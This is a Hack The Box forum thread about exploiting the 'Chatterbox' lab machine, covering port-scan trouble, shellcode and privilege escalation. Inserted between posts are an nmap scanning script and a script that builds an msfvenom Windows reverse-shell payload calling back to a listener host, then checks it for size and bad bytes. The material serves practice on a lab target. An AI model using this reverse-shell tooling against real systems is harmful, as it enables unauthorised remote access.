Chatterbox


Comments

  • You can use sparta for recon and enumeration; it's an amazing toolkit.
    A full port scan will reveal sufficient info for you to go ahead with.
    I am stuck with the exploit right now, wasted 2 days trying to figure out what is missing.

  • ok so I got root.txt without actually spawning an Administrative shell. I'd like to understand how to go about using the privileges I have to get an interactive shell as Admin. Anybody willing to PM me a hint to point me in the right direction?

  • @peek said:
    try allports

    Great advice if you could even scan the thing without being fucked over by reset. Sorry for the language but I've spent weeks on this piece of crap, even wrote scripts to automatically scan small blocks of ports spanning the entire range just to find a single open port. Only to find zero in the morning.

  • For all of those complaining about the slow port scanning, I'd recommend reading up on some nmap flags/options to help get around what's causing the slow down. With the proper flags, you should be able to port scan the entire box fairly quickly.

  • Finally.
    ---->{P00F}!
    For real.

  • edited April 2018

    Tried nmap and masscan, several times, all ports, fast, and twice found one port, but not the same port, and all the other times just found nothing :/ even after resetting the box

    This box is driving me nuts

    Puerkito66

  • Nvm, F#ck this box.

    Puerkito66

  • Can I DM someone to help with payloads?

  • it would be lovely because chatterbox is requested to reset so much.

  • @puerkito66 said:
    Nvm, F#ck this box.

    My thoughts exactly. It took me days to find the port, and now days on days to figure out the payload and I'm still not there.

  • masscan shows me no port is open, no matter my options (stealth scan, UDP scan, for sure). Is masscan that bad?

  • @dmknght said:
    masscan shows me no port is open, no matter my options (stealth scan, UDP scan, for sure). Is masscan that bad?

    The problem with this box is that it can be exploited once at a time; the moment it's being exploited, the useful port becomes "invisible". It's better with a fresh reset :/

    Puerkito66

  • SPOILER: uncommon port, DON'T SPAM reset request.
    If your nmap is so slow, use this option --min-rate
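The scanning advice in this thread (scan the full range, raise the rate floor, then re-scan only what came back open) as an added example; this is not a script from the thread or from any poster. The target address, the output path and the `--min-rate 1000` value are placeholders, and the grepable output used to exercise the parser is constructed, not captured from the box:

```shell
#!/bin/sh
# Added example, not from the thread: full TCP range scan with a rate
# floor, then a targeted service scan of only the ports that came back open.
# Target, output path and rate are placeholder values.

# Extract open TCP ports from "nmap -oG" output as a comma-separated list.
# $1: path to the grepable output file
open_ports_from_grepable() {
    grep -o '[0-9]*/open/tcp' "$1" | cut -d/ -f1 | paste -s -d, -
}

# $1: target host
full_scan() {
    target="$1"
    out=/tmp/allports.gnmap
    # -p- covers all 65535 TCP ports; --min-rate keeps nmap from crawling when
    # the host drops or resets most probes (the slowdown complained about above).
    nmap -p- --min-rate 1000 -T4 -oG "$out" "$target" >/dev/null
    ports=$(open_ports_from_grepable "$out")
    if [ -z "$ports" ]; then
        echo "no open TCP ports found; the box may need a reset" >&2
        return 1
    fi
    # Second pass: version and default scripts on the open ports only.
    nmap -sV -sC -p "$ports" "$target"
}

# Usage: ./fullscan.sh <target-ip>
if [ -n "${1:-}" ]; then
    full_scan "$1"
fi
```

`open_ports_from_grepable` is the part worth keeping around: nmap's `-oG` format puts every port on one `Ports:` line, so a grep for `/open/tcp` is enough to feed the second scan without hand-copying port numbers.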

  • Jeez, finally got a working shell that lasted longer than 20 seconds and rooted, glad to be over this one, the inconsistent shell was driving me mad

  • So when creating the payload, I've managed to get one to encode but the size is nowhere near 512.

    Tried a few different payloads as well as changing some of the buffer length.

    Sort of on the right track for a working buff ?

    KCSEC -- for Pentesting/hacking guides and Tools.

    https://www.ivoidwarranties.tech/ - KCSEC Website
    https://github.com/KCSEC
    https://www.facebook.com/KCovertSEC/

    Join the KCSEC HTB Team

    https://www.hackthebox.eu/home/teams/profile/655
    KCSEC

  • @IVWKCSEC said:
    So when creating the payload, I've managed to get one to encode but the size is nowhere near 512.

    Tried a few different payloads as well as changing some of the buffer length.

    Sort of on the right track for a working buff ?

    Does size really matter, at least in this case :) ?

  • @PencilTester said:
    Finally.
    ---->{P00F}!
    For real.

    I'm guessing you're talking about the python exploit.
    What does it do? I can't figure it out reading the source.

    SCP
    CEH, OSCP

  • @junior said:

    @IVWKCSEC said:
    So when creating the payload, I've managed to get one to encode but the size is nowhere near 512.

    Tried a few different payloads as well as changing some of the buffer length.

    Sort of on the right track for a working buff ?

    Does size really matter, at least in this case :) ?

    Haha thats what they all say !

    I've tried with a custom payload .. basic one of a shell_tcp but it never connects back.

    I'll have to keep trying /setup it in a local lab to get it working.

    KCSEC

  • @scp said:

    @PencilTester said:
    Finally.
    ---->{P00F}!
    For real.

    I'm guessing you're talking about the python exploit.
    What does it do? I can't figure it out reading the source.

    Yes, there are two key parts to it, which it shows you in the comments.

    One is the payload and the other is the UDP port.

    Look up msfvenom and the payload that's already there and see if you can figure out what it does and how it could be changed :)

    KCSEC
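Several posts above revolve around swapping the exploit's payload for an msfvenom one and getting the size right. The following is an added example of the pre-flight checks to run before pasting new shellcode into an exploit; it is not the thread's exploit and not any poster's code. The 512-byte budget comes from the size mentioned above, while the payload name, the null-byte-only bad-char list, the listener address and the output path are placeholders for whatever the exploit actually requires:

```shell
#!/bin/sh
# Added example, not the thread's exploit: generate a reverse-shell payload
# with msfvenom, then confirm it fits the buffer and contains no bad bytes
# before it goes into the exploit. Limit and bad-char list are placeholders.

# Return 0 if file $1 is at most $2 bytes.
payload_fits() {
    size=$(wc -c < "$1" | tr -d ' ')
    [ "$size" -le "$2" ]
}

# Return 0 if file $1 contains none of the bytes in $2 (space-separated
# lowercase hex pairs, e.g. "00 0a 0d").
payload_clean() {
    # one hex byte per line, no offsets, no "*" collapsing of repeats
    hex=$(od -An -v -tx1 "$1" | tr -s ' \n' '\n' | sed '/^$/d')
    for bad in $2; do
        if printf '%s\n' "$hex" | grep -qx "$bad"; then
            return 1
        fi
    done
    return 0
}

# $1: LHOST, $2: LPORT. Prints the payload as a hex string on success.
build_payload() {
    out=/tmp/shell.bin
    # -b tells the encoder which bytes to avoid; -f raw gives plain bytes.
    msfvenom -p windows/shell_reverse_tcp LHOST="$1" LPORT="$2" \
        -b '\x00' -f raw -o "$out" >/dev/null 2>&1 || return 1
    payload_fits "$out" 512 || { echo "payload too large for the buffer" >&2; return 1; }
    payload_clean "$out" "00" || { echo "payload still contains a bad byte" >&2; return 1; }
    od -An -v -tx1 "$out" | tr -d ' \n'
}

# Usage: ./payload.sh <LHOST> <LPORT>
if [ -n "${2:-}" ]; then
    build_payload "$1" "$2"
fi
```

Running the two checks separately from msfvenom is the point: an encoder can succeed and still emit a stub or a few bytes the target mangles, and a payload that is encoded but over budget will silently truncate. When the shell still does not come back after both checks pass, test the same bytes against a local copy of the software, as the warning a few posts further up recommends.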

  • NVM got some alternative shellcode
    No stable connection but able to grab user.txt

    SCP

  • Just a warning, i had both the valid exploit with valid shellcode, when the machine has just been reset it works fine, but any other time it just doesn't connect back.

    So just be aware, just because its not connecting or stable doesn't mean you are doing it wrong, it COULD be the machine... or it could be your shellcode. So if you aren't sure, install the software locally to test and confirm.

  • Got it , VPN IP had changed lol.
    Priv esc now

    KCSEC

  • Can anyone help me with privesc? I'm totally stuck. PM please.

  • man this box made me feel like an idiot. Really simple after the first step, don't think too hard trying to privesc.

    Looking for past Hack the Box write-ups or other security stuff? Feel free to visit: https://dastinia.io <3

  • can anyone pm me for the payload?

  • Got root. No need for privilege escalation. Just see where in Windows the shell is landing you.

  • has anyone managed through the metasploit exploit? or does only the python script work?

  • > @w31rd0 said:
    > has anyone managed through the metasploit exploit? or does only the python script work?

    Python was completely stable for me

  • Hello guys,

    I am stuck on the exploit. I found the ports and the exploit in python, which uses simple shellcode. I generated another one with msfvenom but it doesn't work. Can someone help me please? This is my first challenge here and I am really lost

    Thanks

  • edited May 2018
    For the people who still have problems with the payload, you do not need to do
    session migration. A shell payload is enough to become user and root. Find the right
    payload and change the advanced option, then you have it.
    